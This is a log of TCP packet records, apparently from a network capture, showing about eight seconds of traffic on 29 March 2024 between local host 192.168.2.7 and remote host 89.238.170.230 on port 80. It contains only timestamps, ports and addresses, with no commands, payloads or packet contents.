Mar 29, 2024 14:24:04.024938107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.025038958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.234911919 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.234935045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.235038996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.239741087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.240303040 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.246350050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.246404886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.246476889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.301347017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.301548958 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.471676111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.471743107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.478218079 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.478270054 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.478305101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.478403091 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.693552017 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.693569899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.693615913 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.698528051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.698632956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.908143044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.908166885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.908221960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.908236027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:04.912651062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:04.912719965 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.134260893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.134285927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.138394117 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.138410091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.139513969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.368921041 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.369009972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.369012117 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.369083881 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.369097948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.369122982 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.369143009 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.586878061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.586941004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.587100029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.587152958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.587163925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.587168932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.587196112 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.587208033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.801609993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.801682949 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.801865101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.801909924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.801965952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.801985025 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:05.802006960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:05.802022934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.006722927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.006747007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.006805897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.006928921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.006975889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.006983042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.006989956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.007019997 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.007035971 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.007046938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.007086039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.221595049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.221611977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.221658945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.221760988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.221806049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.222070932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.222084999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.222124100 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.448725939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.448751926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.448766947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.448781013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.448816061 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.448836088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.502415895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.502496004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.666491985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.666516066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.666529894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.666619062 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.666620016 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.721982956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.725590944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.883326054 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.883389950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.883389950 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.883440018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.883502960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.883548021 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.883555889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.883647919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:06.943882942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.943905115 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:06.943995953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.098409891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.098666906 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.098702908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.098721027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.163024902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.163048983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.163157940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.163163900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.163578033 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.327653885 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.327734947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.327734947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.331929922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.382535934 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.383740902 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.391623974 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.391906977 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.539315939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.541464090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.542393923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.543813944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.589627028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.592642069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.596863031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.597578049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.747708082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.747734070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.747776031 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.747797966 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.750538111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.750586987 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.804392099 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.804482937 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.809506893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.809576035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.959358931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.959383965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.959464073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.961704016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.961724997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:07.961766005 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:07.961802006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.009663105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.009776115 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.013231039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.013290882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.161345005 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.161369085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.161482096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.163161993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.163238049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.210252047 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.210268021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.210369110 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.214004993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.214068890 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.378650904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.378669024 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.378720045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.378741026 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.380328894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.380386114 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.429027081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.429068089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.429161072 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.433016062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.433083057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.594141006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.594238043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.595650911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.595706940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.595726013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.595769882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.647011042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.647034883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.647156000 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.650903940 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.650985956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.822128057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.822328091 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:08.877799034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.877823114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.877835989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.877842903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:08.877923012 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.041757107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.041799068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.041894913 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.091149092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.091180086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.091247082 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.091536045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.256625891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.256639957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.256700993 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.304286957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.304362059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.304382086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.304425001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.462512970 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.462547064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.462583065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.462626934 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.462641001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.462662935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.462688923 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.505971909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.505995989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.506108046 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.663656950 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.663683891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.663697004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.663711071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.663810968 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.663852930 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.706243992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.706269026 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.706307888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.706383944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.706439972 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.869271040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.869296074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.869308949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.869323969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.869355917 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.869400024 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.917599916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.917623043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.917660952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.917691946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:09.917701006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:09.917737007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.087502003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.087565899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.087582111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.087591887 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.087637901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.087637901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.131716967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.131747961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.132150888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.132175922 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.136343956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.311983109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.312069893 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.312129974 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.312144995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.312169075 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.312189102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.530303955 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.530325890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.530339003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.530354977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.530369043 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.530374050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.530419111 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.530419111 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.530422926 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.530436993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.530456066 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.530482054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.738923073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.739320040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.739366055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.739379883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.739392996 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.739404917 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.739434004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.739445925 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.739489079 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.967863083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.967884064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.967924118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.968018055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.968058109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.968102932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.968144894 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.968189001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:10.968231916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.968276978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:10.968317032 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.172880888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.172898054 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.172979116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.172987938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.173003912 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.173053980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.173321009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.173336029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.173384905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.173404932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.173438072 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.173480034 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.173502922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.381247044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.381272078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.381314039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.381335974 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.381393909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.381407976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.381448030 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.382000923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.382014036 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.382026911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.382052898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.382065058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.382076979 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.382107019 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.595118999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.595237017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.605328083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.605416059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.605439901 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.605462074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.605580091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.605623007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.606621981 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.606657028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.606667042 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.606709003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.807317972 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.807391882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.815831900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.815910101 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.816092968 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.816140890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.816159010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.816179991 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.816912889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.816934109 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:11.816970110 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:11.816993952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.019414902 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.019435883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.019469976 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.019490957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:12.028104067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:12.028155088 CET	49699	80	192.168.2.7	89.238.170.230
